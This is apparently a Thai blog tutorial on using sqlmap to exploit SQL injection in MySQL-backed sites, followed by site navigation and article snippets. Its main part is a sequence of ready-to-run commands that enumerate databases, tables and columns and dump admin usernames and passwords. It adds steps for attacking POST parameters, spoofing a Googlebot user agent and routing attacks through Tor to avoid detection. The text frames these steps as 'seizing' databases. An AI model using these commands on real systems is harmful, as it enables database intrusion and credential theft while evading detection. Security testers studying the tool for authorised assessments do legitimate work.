สวัสดีครับในบทความนี้ผมจะพามาเรียนรู้การวิธีใช้ SQLmap เครื่องมืออำนวยความสะดวกสำหรับการยึดฐานข้อมูล MYSQL ที่มีช่องโหว่ SQL Injection กันนะครับ โดยผมจะขอข้ามลายอะเอียดของช่องโหว่ตัวนี้ เนื่องจากผมได้เคยเขียนไปแล้วในบทความที่ 27 สาเหตุของการเกิดช่องโหว่ SQL Injection และวิธีป้องกัน

ช่องโหว่บน Parameter GET/POST

GET Parameter เป็น Parameter ที่มีช่องโหว่ SQL Injection ที่พบเจอได้ง่าย และมากที่สุด โดยจะมีวิธีเช็คง่ายๆ คือหากผู้โจมตีใส่เครื่องหมาย ' ลงไปหลัง GET Parameter หน้าเว็บก็จะแสดง MYSQL Error ขึ้นมาว่า You have an error in your SQL syntax; หรืออีกกรณีหนึ่ง หน้าเว็บอาจจะเปลี่ยนไปเป็นหน้าว่างๆแทน (ไม่มีข้อมูลที่อ้างอิงจากค่า Parameter ที่ผู้ใช้กรอก อยู่จริงในฐานข้อมูล) ซึ่งนั้นก็หมายถึง การส่งค่า Parameter ดังกล่าวอาจจะมีช่องโหว่นั้นเอง

การโจมตีช่องโหว่ SQL Injection โดยใช้ SQLmap

สำหรับ GET Parameter จะใช้วิธีดังนี้

sqlmap -u https://www.costerraid.com/?id= --dbs 
//ใช้ --dbs เพื่อ list ฐานข้อมูลทั้งหมดที่ User นั้นมีสิทธิ์ออกมา

sqlmap -u https://www.costerraid.com/?id= -D member_db --table 
//ใช้ --table เพื่อ list tables ทั้งหมดจากฐานข้อมูล "member_db"

sqlmap -u https://www.costerraid.com/?id= -D member_db -T admin --column 
//ใช้ --column เพื่อ list column ทั้งหมดจาก table "admin" ในฐานข้อมูล "member_db"

sqlmap -u https://www.costerraid.com/?id= -D member_db -T admin -C username,password --dump 
//dump username, password  ทั้งหมดจาก column "username,password" ใน table "admin"

สำหรับ POST Parameter จะเพิ่ม --data เข้าไปเพื่อใช้อ้างอิงการส่งข้อมูลแบบ POST

sqlmap -u https://www.costerraid.com/ --data="bug=872&page=12"

การโจมตีให้มีความปลอดภัย

การปลอม User Agent

sqlmap -u https://www.costerraid.com/ --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

การโจมตีโดยใช้ Tor ร่วมด้วย

sqlmap -u https://www.costerraid.com/ --tor

ตัวเลือกการโจมตีอื่นๆ

เจาะจง Parameter พิเศษโดยใช้ marker จุดที่จะ Inject

sqlmap -u https://www.costerraid.com/id/15*

เจาะจง Parameter พิเศษโดยใช้ -p

sqlmap -u https://www.costerraid.com/ --data="bug=872&page=12" -p page

อ้างอิงข้อมูลบางส่วนจาก: stephack.com

บทความที่ถูกอ่านล่าสุด

เรียนรู้การใช้งาน SQLmap สำหรับการโจมตีช่องโหว่ SQL Injection

สวัสดีครับในบทความนี้ผมจะพามาเรียนรู้การวิธีใช้ SQLmap เครื่องมืออำนวยความสะดวกสำหรับการยึดฐานข้อมูล MYSQL ที่มีช่องโหว่ SQL Injection กันนะครับ ...

ที่อยู่: 3.233.220.21

ทดสอบความเร็วอินเทอร์เน็ต บนเว็บไซต์ speedtest.net

speedtest.net เป็นบริการทางอินเทอร์เน็ตที่จะแสดงความเร็วของอินเทอร์เน็ตในการ Download, Upload และค่า Ping ของผู้ใช้ โดยหลักการทำงานคือ เว็บไซต์จะส่ง p...

ที่อยู่: 66.249.73.150

ทดสอบความเร็วอินเทอร์เน็ต บนเว็บไซต์ speedtest.net

speedtest.net เป็นบริการทางอินเทอร์เน็ตที่จะแสดงความเร็วของอินเทอร์เน็ตในการ Download, Upload และค่า Ping ของผู้ใช้ โดยหลักการทำงานคือ เว็บไซต์จะส่ง p...

ที่อยู่: 3.233.220.21

4 อันดับ Linux ใช้งานฟรี UI สวย ในดวงใจ!

1. Deepin Linux Deepin หรือที่หลายๆคนรู้จักกันในชื่อ Hiweed Linux เป็นระบบ Open Source จากพื้นฐานของ Linux อย่าง Debian พัฒนาโดย Wuhan Deepin Technology Co., Ltd., บร...

ที่อยู่: 3.233.220.21

ป้องกันเว็บไซต์ถูก DDoS ด้วย Cloudflare

เพื่อนๆ รวมถึง Webmaster หลายๆคน อาจเคยถูกผู้ไม่ประสงค์ดี หรือ Hacker ทำการโจมตีเว็บไซต์ ให้ไม่สามารถใช้งานได้ โดยวิธีการ DDoS หรือที่เรียกกันง่ายๆว่า ก...

ที่อยู่: 3.233.220.21


บทความแนะนำ

SSD ดีกว่า HDD ธรรมดายังไง??

วิธีสมัครใช้งาน ฟรีแชร์โฮสของ Costerraid Studio

สร้าง Virtual Machine ด้วย Hyper-V บน Windows Pro และ Windows Server

MYSQL เบื้องต้น บทที่ 1 คำสั่งพื้นฐานของ SQL

ยอดอ่านสูงสุด

แก้ปัญหา Disk และ CPU ขึ้น 100% ใน Task manager (Windows)

Hardware

Storage


พื้นที่ว่างคงเหลือ 841.25 GB

ติดตามเราบน Facebook